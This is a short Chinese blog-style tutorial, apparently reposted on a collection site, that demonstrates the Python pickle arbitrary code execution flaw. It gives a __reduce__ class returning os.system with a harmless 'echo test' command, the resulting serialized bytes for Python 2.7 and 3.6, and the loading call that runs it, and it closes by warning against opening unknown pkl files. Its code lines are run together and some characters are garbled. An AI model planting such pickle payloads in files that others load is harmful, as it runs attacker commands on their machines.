我們通常使用pickle將python對(duì)象序列化，但是pickle在加載時(shí)有一個(gè)副作用就是它會(huì)自動(dòng)加載相應(yīng)模塊并構(gòu)造實(shí)例對(duì)象。這樣就造成了一個(gè)很危險(xiǎn)的代碼，如果被黑客利用的話會(huì)造成非常嚴(yán)重的后果。

我首先在python2.7下測(cè)試，通過(guò)如下代碼生成payload

import pickle import os class gen(object):def __reduce__(self):s = """echo test > payload.txt""" return os.system, (s,) p = gen() payload = pickle.dumps(p) with open('payload.pkl', 'wb') as f:f.write(payload)

輸出的payload是這樣的

cnt system p1 (S'echo test > payload.txt' p2 tRp3 .

我們通過(guò)如下代碼去執(zhí)行payload

import pickle pickle.load(open('./payload.pkl'))

通過(guò)執(zhí)行上面這個(gè)代碼，我們?cè)谙嗤募A下生成了payload.txt文件，并且內(nèi)容是test。

接著我們將上面的測(cè)試放到python3.6下面，通過(guò)和python2.7下面相同的代碼生成payload

€cnt system q X echo test > payload.txtq卶Rq.

我們通過(guò)如下代碼去執(zhí)行payload

import pickle pickle.load(open('./payload.pkl', 'rb'))

通過(guò)執(zhí)行上面這個(gè)代碼，我們得到了和python2.7下面相同的結(jié)果。

也就是說(shuō)，只要在我們編寫的代碼中有打開pkl文件操作的代碼存在的話，那么都會(huì)出現(xiàn)上述的問(wèn)題。你可以想象到，這是多么危險(xiǎn)的一件事情。所以這就要求我們?cè)诰帉懘a時(shí)，不要隨便打開不知名的pkl文件。

總結(jié)

以上是生活随笔為你收集整理的Python Pickle任意代码执行漏洞的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。